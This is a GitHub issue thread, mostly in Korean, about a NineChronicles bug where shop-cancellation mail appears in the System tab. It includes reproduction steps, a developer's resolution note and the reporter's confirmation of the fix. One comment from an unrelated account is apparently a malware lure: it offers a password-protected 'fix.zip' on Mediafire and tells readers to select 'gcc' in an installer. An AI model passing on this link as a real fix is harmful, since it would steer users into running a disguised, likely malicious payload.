### ISSUE TITLE
[상점] 상점에 등록된 상품 취소 시 취소 메일이 시스템 탭에 출력되는 현상

### ISSUE THREAD

**Issue by QgamesGeonPyoNoh** [planetarium/NineChronicles#5728]
### APV version info

v200220

### Client version info

v220.0.1

### Device

Windows

### detailed device info

Windows 10

### account address info

0x3146FE0E47A1998e14cd8a33640e3648A5A90276

### What happened?

[내용]
상점에 등록된 상품 취소 시 취소 메일이 시스템 탭에 출력되는 현상
- Windows 환경에서 발생 확인했습니다.
- 해당 이슈 발생 당시 Log 파일 공유드립니다.

[Log.zip](https://github.com/user-attachments/files/16745572/Log.zip)

https://github.com/user-attachments/assets/b2d80834-8d6b-460a-9d4e-33befc7f4f3d

### How to reproduce the issue

[재현 스텝]
1. 메인 로비 - 상점 클릭
2. Sell 버튼 클릭 - 등록된 상품 취소 진행
3. 메일 확인 시 상품 취소 메일이 시스템 탭에 출력되는 현상 확인

[Should be]
상품 취소 메일 확인 시 Shop 탭에 출력되어야 합니다.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eugene-doobu** [comment]
아래 issue에서 해결될 것으로 판단되어 qa상태로 옮겼습니다
https://github.com/planetarium/lib9c/issues/2845

**Comment by QgamesGeonPyoNoh** [comment]
수정 내용 확인 완료되었습니다.

[테스트 환경]
Windows.v200230-230.0.2
https://github.com/user-attachments/assets/68dda1e1-3809-4015-9762-7a3b4583487c
